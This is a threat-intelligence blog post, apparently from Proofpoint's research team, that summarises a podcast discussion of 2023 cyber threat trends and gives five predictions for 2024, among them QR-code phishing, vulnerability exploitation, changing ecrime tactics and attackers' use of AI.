Gather ‘round, cyber friends, and I’ll let you in on a little secret: no one knows what the Next Big Thing on the threat landscape will be. But we can look back on 2023, identify notable changes and actor behaviors, and make educated assessments about what 2024 will bring.
This month on the DISCARDED podcast my co-host Crista Giering and I sat down with our Threat Research leaders Daniel Blackford, Alexis Dorais-Joncas, Randy Pargman, and Rich Gonzalez, leaders of the ecrime, advanced persistent threat (APT), threat detection, and Emerging Threats teams, respectively. We discussed what we learned over the last year, and what’s on the horizon for the future. While the discussions touched on different topics and featured different opinions on everything from artificial intelligence (AI) to living off the land binaries (LOLBins) to vulnerability exploitation to ransomware, there were some notable themes that are worth writing down. We can’t say for sure what surprises are in store, but with our cyber crystals balls fully charged – and a deep knowledge of a year’s worth of threat actor activity based on millions of email threats per day – we can predict with high confidence what’s going to be impactful in the coming year.
1: Quick response (QR) codes will continue to proliferate
2023 was the year of the QR code. Although not new, QR codes burst on the scene over the last year and were used in many credential phishing and malware campaigns. The use was driven by a confluence of factors, but ultimately boiled down to the fact that people are now way more accustomed to scanning QR codes for everything from instructions to menus. And threat actors are taking advantage. Proofpoint recently launched new in-line sandboxing capabilities to better defend against this threat, and our teams anticipate seeing more of it in 2024. Notably, however, Dorais-Joncas points out that QR codes still just exist in the realm of ecrime – APT actors have not yet jumped on the QR code bandwagon. (Although, some of those APT actors bring ecrime energy to their campaigns, so it’s possible they may start QR code phishing, too.)
2: Zero-day and N-day vulnerability exploitation
A theme that appeared throughout our conversations was the creative use of vulnerabilities – both known and unreported – in threat actor activity. APT actors used a wide variety of exploits, from TA473 exploiting publicly-facing webmail servers to espionage actors using a zero-day in an email security gateway appliance that ultimately forced users to rip out and reinstall physical hardware. But ecrime actors also exploited their share of vulnerabilities, including the MOVEit file transfer service vulnerability from the spring of 2023 that had cascading repercussions, and the ScreenConnect flaw announced in the fall of 2023 – both of which were used by ecrime actors before being officially published. Proofpoint anticipates vulnerability exploitation will continue, driven in part by improved defense making old school techniques – like macro-enabled documents – much less useful, as well as the vast financial resources now available to cybercriminals that were once just the domain of APT. Pargman says the creativity from ecrime threat actors is a direct response of defenders imposing cost on our adversaries.
3: Continuing, unexpected behavior changes
Avid listeners of the podcast know I have regularly said the ecrime landscape is extremely chaotic, with TA577 demonstrating the most chaotic vibes of them all. The tactics, techniques, and procedures (TTPs) of some of the most sophisticated actors continue to change. The cost imposed on threat actors that Pargman mentioned – from law enforcement takedowns of massive botnets like Qbot to improved detections and automated defenses – have forced threat actors, cybercriminals in particular, to regularly change their behaviors to figure out what is most effective. For example, recently Proofpoint has observed the increased use of: traffic distribution systems (TDSes) such as 404 TDS and Keitaro TDS; unique, infrequently observed filetypes such as URL shortcut (.url) and scalable vector graphic (.svg); multiple new malware loaders and information stealers; and older malware like DarkGate resurfacing as popular payloads. Ecrime threat actors will change their behaviors in direct response to what defenders are doing, and we expect to see a lot more TTP experimentation in 2024.
4: Artificial Intelligence (AI)
Threat actors will explore ways to incorporate AI into their workflows in similar ways as corporations are currently exploring themselves. While there is much concern about AI-created phishing emails and content in general, the impact of such threats will be negligible because the same tools that detect malicious language, sentiment, tone, subject, etc. are just as effective against robots as humans. What will be impactful is using AI tools to improve overall efficiency, such as scaling information operations or fraud that begins with a benign conversation; using coding assistants to fill knowledge gaps; or creating malicious content faster. At Proofpoint, one of the most effective AI tools in our Threat Research toolbox is Camp Disco, our malware clustering engine. Our data scientists created a custom language model for malware forensics that serves as the backbone for Camp Disco, and the result is hundreds of hours saved while threat hunting.
5: Community sharing is community defense
One of the best parts of the Emerging Threats team is the incredible support we get from the community sharing information on new malware, TTPs, infrastructure, packet captures (PCAPs), phishing kits, and so much more. The Threat Research blog also serves as a way for our team to share the latest insights gleaned from our vast corpus of data. As the threat landscape continues to change and new threats, exploits, and techniques emerge, the cybersecurity community continues to collectively share and defend against our adversaries. In 2024, this community mindset is going to be more important than ever. And we can’t wait to be a part of it.
Listen to the DISCARDED episodes now:
Phishing, Elections, and Costly Attacks: Part One of Predicting Cyber Threats in 2024
Strategies for Defense and Disruption: Part Two of Predicting Cyber Threats in 2024
Thanks to all our listeners, and until next time, happy hunting!